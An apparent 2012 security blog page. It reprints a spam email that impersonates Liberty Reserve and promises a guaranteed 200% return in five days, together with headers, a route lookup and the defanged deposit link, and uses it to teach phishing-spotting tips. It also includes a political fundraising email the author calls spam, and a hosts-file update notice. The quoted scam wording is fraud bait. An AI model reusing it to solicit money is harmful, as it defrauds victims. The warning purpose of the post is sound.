source: RIPE # Filtered

% Information related to '62.193.15.0/24AS5618'

route: 62.193.15.0/24
descr: DP Iran
origin: AS5618
mnt-by: DPI-MNT
source: RIPE # Filtered


The headers;

Return-Path: <no_reply@libertyreserve.com>
Delivered-To: [REMOVED]
X-Spam-Flag: YES
X-Spam-Score: 9.71
X-Spam-Level: *********
X-Spam-Status: Yes, score=9.71 tagged_above=-9999 required=1.3
tests=[ACT_NOW_CAPS=2.211, BAYES_00=-1.9, FH_FROMEML_NOTLD=1.082,
FS_LARGE_PERCENT2=1.96, HTML_MESSAGE=0.001,
HTML_MIME_NO_HTML_TAG=0.377, MIME_HTML_ONLY=0.723,
MIME_HTML_ONLY_MULTI=0.001, MIME_QP_LONG_LINE=0.001,
MPART_ALT_DIFF=0.79, ONE_TIME=0.714, RCVD_IN_BRBL_LASTEXT=1.449,
RDNS_NONE=0.793, RISK_FREE=0.001, SPF_FAIL=0.001,
SPF_HELO_PASS=-0.001, SUBJ_ALL_CAPS=1.506, TO_NO_BRKTS_PCNT=0.001]
autolearn=no
Received: from server144.dnslake.com (unknown [62.193.15.160])
by mail4.emailconfig.com (Postfix) with ESMTP id 1711739814F
for <[REMOVED]>; Mon, 6 Feb 2012 22:52:19 +0000 (GMT)
Received: (qmail 32531 invoked from network); 7 Feb 2012 02:20:43 +0330
Content-Type: multipart/alternative;
boundary="===============4901855315610602507=="
MIME-Version: 1.0
Subject: [SPAM] =?iso-8859-1?q?GUARANTEED_200=25_MONEY_IN_5_DAYS_!!!?=
From: =?iso-8859-1?q?no=5Freply=40libertyreserve=2Ecom?=
Message-Id: <20120206225221.1711739814F@mail4.emailconfig.com>
Date: Mon, 6 Feb 2012 22:52:19 +0000 (GMT)
To: undisclosed-recipients:;



The content of the e-mail itself;

============================================
Please note that in all e-mails from Liberty Reserve we will:
Always address you by your first name.
Never send you any links or attached files.
Never ask you to send us your password and/or login PIN.
============================================

Dear Members,

Liberty Reserve has made considerable progress and improvement, it has become the leading e-currency and its services are being improved continuously.

Recently we have estabilished a very important relation with leading Forex traders from Costa Rica and we decided to give a special offer to you:

GET 200% LR MONEY RETURN IN 5 DAYS !!!!

Example:

You deposit $100 we return $200

You deposit $1000 we return $2000

You deposit $5000 we return $10000

This opportunity will not last long, so you must react quickly.

Deposits are accepted until February 15.2012 00:00 (GMT).

One unit in this special program is worth 100 US dollars. The minimal deposit is 1 unit ($100), while the maximum deposit is 1000 units ($100000) per member.

You need to make a spend to: Liberty Reserve account U1209005 -https://sci.libertyreserve.com/?lr_acc=U1209005

The 200% payout will be made back to your LR account in 5 days.

The payout is AUTOMATICAL, GUARANTEED and there is NO RISK from losing your funds.

This is a TIME LIMITED ONE-TIME OFFER and you must ACT NOW!

Please DO NOT reply to this e mail.

For information and support please use our contact form in the help section of our web site.

Thank you.

2002 - 2011 Liberty Reserve S.A. All rights reserved.


So why am I mentioning this, given it is two months old and just a bog standard affiliate spam? Well, the content of the e-mail strangely enough. Or more specifically, two lines of it, that not enough people seem to keep in mind.

Phishing scams and bog standard e-mail scams generally have one thing in common - they rarely include the details you'd expect in the legit versions. For banks etc, and the likes of eBay, PayPal etc - a legit e-mail will ALWAYS include your real name, for other sites.

This e-mail specifically states LR will always include your real name and will never include links - yet this includes a link and doesn't include my real name (not surprising given it's spam - and I've never been a user of or registered with, Liberty Reserve).

I know most will shrug this off and then not keep it in mind the next time spam/phishing e-mails come in your inbox, but one of the main reasons people fall for phishing scams for example, is because they see the banks name, sites name etc, and rarely read what it's actually saying before clicking, and never check where it is linking to, before clicking - and worst still - never check the address bar in the browser, once the phishing site itself has loaded - this needs to change.

If necessary, pop a stick it on your monitor to remind you to;

1. Always fully read e-mails that come into your inbox
2. If an e-mail claims to be from your bank/ebay/PayPal etc - check it includes your FULL REAL NAME!
3. ALWAYS check where it is linking to, before clicking it (hover your mouse over the link to do this)
4. ALWAYS check the URL in the address bar, after it has loaded (assuming you've not done #3)
5. If an e-mail claims to be from your bank/ebay/paypal etc, and asks you to open an attachment - DELETE IT - IT'S MALICIOUS!

Remind others of this too.

/edit

Forgot to mention, there have been 2 additional e-mails since the one in Feb. Both in March and both with the same content.

Headers:

Return-Path: <www@icp.yaton>
Delivered-To: [REMOVED]
X-Spam-Flag: YES
X-Spam-Score: 9.211
X-Spam-Level: *********
X-Spam-Status: Yes, score=9.211 tagged_above=-9999 required=1.3
tests=[ACT_NOW_CAPS=2.211, BAYES_00=-1.9, DKIM_ADSP_DISCARD=1.8,
FS_LARGE_PERCENT2=1.96, HTML_MESSAGE=0.001,
HTML_MIME_NO_HTML_TAG=0.377, MIME_HTML_ONLY=0.723,
NO_DNS_FOR_FROM=0.001, ONE_TIME=0.714, RDNS_NONE=0.793,
RISK_FREE=0.001, SUBJ_ALL_CAPS=1.506, TO_NO_BRKTS_HTML_ONLY=1.022,
TO_NO_BRKTS_NORDNS=0.001, TO_NO_BRKTS_NORDNS_HTML=0.001] autolearn=no
Received: from icp.yaton (unknown [211.152.9.115])
by mail4.emailconfig.com (Postfix) with ESMTP id E106D3981A2
for <[REMOVED]>; Wed, 14 Mar 2012 08:17:43 +0000 (GMT)
Received: from icp.yaton (icp.yaton [127.0.0.1])
by icp.yaton (8.12.8/8.12.8) with ESMTP id q2E6wpAW011996
for <[REMOVED]>; Wed, 14 Mar 2012 14:58:51 +0800
Received: (from www@localhost)
by icp.yaton (8.12.8/8.12.8/Submit) id q2E6wjoK011988;
Wed, 14 Mar 2012 14:58:45 +0800
Date: Wed, 14 Mar 2012 14:58:45 +0800
Message-Id: <201203140658.q2E6wjoK011988@icp.yaton>
To: [REMOVED]
Subject: [SPAM] GET 200% RETURN IN 5 DAYS
From: "no_reply@libertyreserve.com" <no_reply@libertyreserve.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-EsetId: B3625223B4977931E1270B



Same origin IP for both e-mails. Link in both e-mails led to;

hxxps://sci.libertyreserve.com/?lr_acc=U3399815

Saturday 7 April 2012

Jeremy Stinson: Congressmen resorting to spamming?

I already don't trust politicians, never have - they're well known for nothing but lying, but spamming? Is Jeremy Stinson really that desperate?

Stinson 2012<http://www.jeremyrstinson.com/email/images/stinson.jpg>

Dear Colleagues & Associates,
Having been involved in public service since 1997, I have long worked for positive change in Maryland. My family and I now feel that the time has come for me to seek elected office. I want to bring common sense ideas and pragmatic solutions to the U.S. Congress by running for House Representative of Maryland’s 5th Congressional district.

As you know, I have always been very concerned about job growth, fiscal responsibility, and education. I believe there are workable solutions available that will enhance Maryland’s 5th district’s, and the nation’s, short term success, mid-range progress and long term growth. Partisan bickering has done nothing to better our situation as a nation.

Another important issue is sustainable energy. We are addicted to foreign oil and outside energy sources. I believe that any energy policy must begin with using resources at home safely and efficiently, reducing dependence on foreign oil and creating jobs here in America, and especially in Maryland.

To succeed in this effort, I need to mount an aggressive campaign. My opponent is the second most powerful Democrat in the House of Representatives. He’s been in office for 31 years, the last 10 of which have been spent in the Democratic leadership. He has ceased to represent the people and instead has become the face of all that is wrong in Washington. It's for these reasons that I have decided to offer the voters of Maryland’s 5th Congressional district a real choice in 2012.

This campaign requires a strong and organized grassroots organization. My team has been tirelessly booking town hall meetings, speaking engagements and just recently, successfully pulled off my official campaign launch. We’re preparing to order our first batch of brochures, flyers, yard signs, T-shirts and banners. We’re relying heavily on neighborhood canvassing and word of mouth advertising. I cannot do this alone. That is why I'm inviting people that know me well to join my campaign and help make a real difference.

An early contribution of $25, $50, $100, $250, $500 or $2500, made payable to Friends of Jeremy Stinson for Congress will help raise the initial funds needed to launch the campaign and get our message out to the public. At the bottom of this email there are two links, one for monetary contributions and one for volunteering time. If you are opposed to electronic contributions, please feel free to send payments to:

Friends of Jeremy Stinson for Congress
Attn: Rodney Miller, Treasurer
P.O. Box 669
Cheltenham, MD 20623

I hope that you'll decide to become involved and help make a difference. We must begin ordering campaign materials and securing office space by Saturday, April 15, 2012.

We hope to raise $50,000 by May 1, 2012,and $100,000 by the end of June - we are well on our way. I ask for your support in meeting this goal. I hope that you‘ll help me to bring better government to the people of Maryland’s 5th Congressional district.

Thanks in advance for your encouragement and support, and I look forward to hearing from you.



Warmest regards,

Jeremy R. Stinson

<http://jeremyrstinson.us4.list-manage2.com/track/click?u=585e1e9040279ba736db7edb4&id=5df6d3d02a&e=e0e50fb8d5> <mailto:volunteer@jeremyrstinson.com?subject=Campaign Volunteer>
Logo<http://www.jeremyrstinson.com/email/images/logo.jpg>
Friends of Jeremy Stinson for Congress, P.O. Box 669, Cheltenham, Maryland 20623, 202-556-0118


Sent to [REMOVED] — why did I get this? <http://jeremyrstinson.us4.list-manage1.com/about?u=585e1e9040279ba736db7edb4&id=9e557681e2&e=e0e50fb8d5&c=7c2a6d6f9a>
unsubscribe from this list <http://jeremyrstinson.us4.list-manage.com/unsubscribe?u=585e1e9040279ba736db7edb4&id=9e557681e2&e=e0e50fb8d5&c=7c2a6d6f9a> | update subscription preferences <http://jeremyrstinson.us4.list-manage.com/profile?u=585e1e9040279ba736db7edb4&id=9e557681e2&e=e0e50fb8d5>
Friends of Jeremy Stinson for Congress • PO Box 669 • Cheltenham, MD 20623
<http://jeremyrstinson.us4.list-manage.com/track/open.php?u=585e1e9040279ba736db7edb4&id=7c2a6d6f9a&e=e0e50fb8d5>


Return-Path: <bounce-mc.us4_8745045.131497-sharecash_org=it-mate.co.uk@mail33.us4.mandrillapp.com>
Delivered-To: [REMOVED]
X-Spam-Flag: NO
X-Spam-Score: -4.5
X-Spam-Level:
X-Spam-Status: No, score=-4.5 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1,
HTML_MESSAGE=0.001, LOTS_OF_MONEY=0.001, MIME_QP_LONG_LINE=0.001,
RCVD_IN_DNSWL_NONE=-0.0001, RCVD_IN_IADB_DK=-0.095,
RCVD_IN_IADB_LISTED=-0.001, RCVD_IN_IADB_RDNS=-0.235,
RCVD_IN_IADB_SENDERID=-0.001, RCVD_IN_IADB_SPF=-0.059,
RCVD_IN_IADB_VOUCHED=-2.2, SPF_HELO_PASS=-0.001, SPF_PASS=-0.001,
T_RP_MATCHES_RCVD=-0.01] autolearn=ham
Authentication-Results: spam2.emailconfig.com (amavisd-new); dkim=pass
header.i=connect=jeremyrstinson.com@mail33.us4.mandrillapp.com
Authentication-Results: spam2.emailconfig.com (amavisd-new); domainkeys=pass
header.sender=connect=jeremyrstinson.com@mail33.us4.mandrillapp.com
Received: from mail33.us4.mandrillapp.com (mail33.us4.mandrillapp.com [205.201.136.33])
by mail4.emailconfig.com (Postfix) with ESMTP id 43A00398110
for <[REMOVED]>; Sat, 7 Apr 2012 20:14:43 +0100 (BST)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=k1; d=mail33.us4.mandrillapp.com;
h=Subject:From:Reply-To:To:Date:Message-ID:List-Unsubscribe:Sender:Content-Type:MIME-Version; i=connect=3Djeremyrstinson.com@mail33.us4.mandrillapp.com;
bh=lwzbuw5CGR9WdhCHo03GjIDlVJo=;
b=wVQGICgTBlL9k+A4LQ54zLvLthnDBlInJ0Z/7/mwFD7FmMDDglRxPYdBRa+Q0vUnrTrmWQJI2kMV
tSbwhwroTLTm2a9MmNalET5y5FHLLiseHW9SqY6kAl6NImpAB4Uik5oMHvBt64/cq7c0PhdDrU8x
kE3DW4CPwuxBBiWA+8c=
DomainKey-Signature: a=rsa-sha1; c=nofws; q=dns; s=k1; d=mail33.us4.mandrillapp.com;
b=NDrccBNzIYsSqh+C++3EpOL0CxfnwLl9b6zHglEqvzEqQ1qyEWSvVjP+uzoYZ92ExSoDn7zdk7KW
VJk8hBhZAn9lIVuf3Rf+pVNZnSoiBDcxBvOJeP8IWV9xBplPBiuNcnPGC7q1OiEdI2iUIvAgSYf6
lHKR9mwS3qQ0V4XU6Wk=;
Received: from (127.0.0.1) by mail33.us4.mandrillapp.com id hg292814i28t for <[REMOVED]>; Sat, 7 Apr 2012 19:14:37 +0000 (envelope-from <bounce-mc.us4_8745045.131497-sharecash_org=it-mate.co.uk@mail33.us4.mandrillapp.com>)
Subject: =?utf-8?Q?I=20Have=20Great=20News=20to=20Share=20With=20You=21?=
From: =?utf-8?Q?Friends=20of=20Jeremy=20Stinson=20for=20Congress?= <connect@jeremyrstinson.com>
Reply-To: =?utf-8?Q?Friends=20of=20Jeremy=20Stinson=20for=20Congress?= <connect@jeremyrstinson.com>
To: <[REMOVED]>
Date: Sat, 7 Apr 2012 19:14:37 +0000
Message-ID: <585e1e9040279ba736db7edb4e0e50fb8d5.20120407191430@mail33.us4.mandrillapp.com>
X-Mailer: MailChimp Mailer - **CID7c2a6d6f9ae0e50fb8d5**
X-Campaign: mailchimp585e1e9040279ba736db7edb4.7c2a6d6f9a
X-campaignid: mailchimp585e1e9040279ba736db7edb4.7c2a6d6f9a
x-im: 38509-7c2a6d6f9a
X-Report-Abuse: Please report abuse for this campaign here: http://www.mailchimp.com/abuse/abuse.phtml?u=585e1e9040279ba736db7edb4&id=7c2a6d6f9a&e=e0e50fb8d5
x-accounttype: pd
List-Unsubscribe: <mailto:unsubscribe-585e1e9040279ba736db7edb4-7c2a6d6f9a-e0e50fb8d5@mailin1.us2.mcsv.net?subject=unsubscribe>, <http://jeremyrstinson.us4.list-manage.com/unsubscribe?u=585e1e9040279ba736db7edb4&id=9e557681e2&e=e0e50fb8d5&c=7c2a6d6f9a>
Sender: "Friends of Jeremy Stinson for Congress" <connect=jeremyrstinson.com@mail33.us4.mandrillapp.com>
x-mcda: FALSE
Content-Type: multipart/alternative; boundary="_----------=_MCPart_999679477"
MIME-Version: 1.0



And yes, it's been reported to MailChimp ;o)

Friday 6 April 2012

hpHosts: Updated April 6th 2012

The hpHOSTS Hosts file has been updated. There is now a total of 197,290 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 06/04/2012 08:00
  2. Last Verified: 05/04/2012 04:00/li>
Download hpHosts now!
http://hosts-file.net/?s=Download